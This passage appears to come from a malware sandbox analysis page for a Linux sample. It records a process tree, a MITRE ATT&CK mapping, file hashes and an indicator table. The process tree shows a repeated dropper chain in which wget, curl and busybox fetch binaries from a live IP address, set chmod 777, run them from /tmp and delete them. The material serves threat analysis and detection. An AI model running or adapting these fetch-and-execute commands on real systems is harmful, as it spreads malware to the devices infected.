/bin/rm
rm nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
2⤵
PID:963

/usr/bin/wget
wget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
2⤵
PID:964

/usr/bin/curl
curl -O http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
2⤵
PID:966

/bin/chmod
chmod 777 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
2⤵
- File and Directory Permissions Modification
PID:967

/tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
./UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
2⤵
- Executes dropped EXE
PID:968

/bin/rm
rm UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
2⤵
PID:969

/usr/bin/wget
wget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
2⤵
PID:970

/usr/bin/curl
curl -O http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
2⤵
PID:972

/bin/chmod
chmod 777 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
2⤵
- File and Directory Permissions Modification
PID:973

/tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
./vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
2⤵
- Executes dropped EXE
PID:974

/bin/rm
rm vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
2⤵
PID:975

/usr/bin/wget
wget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
2⤵
PID:976

/usr/bin/curl
curl -O http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
2⤵
PID:978

/bin/chmod
chmod 777 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
2⤵
- File and Directory Permissions Modification
PID:979

/tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
./DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
2⤵
- Executes dropped EXE
PID:980

/bin/rm
rm DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
2⤵
PID:981

/usr/bin/wget
wget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
2⤵
PID:982

/usr/bin/curl
curl -O http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
2⤵
PID:984

/bin/chmod
chmod 777 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
2⤵
- File and Directory Permissions Modification
PID:985

/tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
./aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
2⤵
- Executes dropped EXE
PID:986

/bin/rm
rm aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
2⤵
PID:987

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	process
/tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8	746	SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
/tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR	752	j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
/tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX	758	nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
/tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6	786	UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
/tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO	814	rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
/tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx	821	vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
/tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm	828	DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
/tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd	855	aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
/tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf	872	TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
/tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR	878	JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
/tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK	884	yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
/tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk	890	jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
/tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm	896	ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
/tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt	902	YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
/tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf	908	TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
/tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR	914	JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
/tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK	920	yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
/tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk	926	jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
/tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm	932	ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
/tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt	938	YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
/tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO	944	rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
/tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8	950	SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
/tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR	956	j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
/tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX	962	nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
/tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6	968	UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
/tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx	974	vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
/tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm	980	DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
/tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd	986	aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads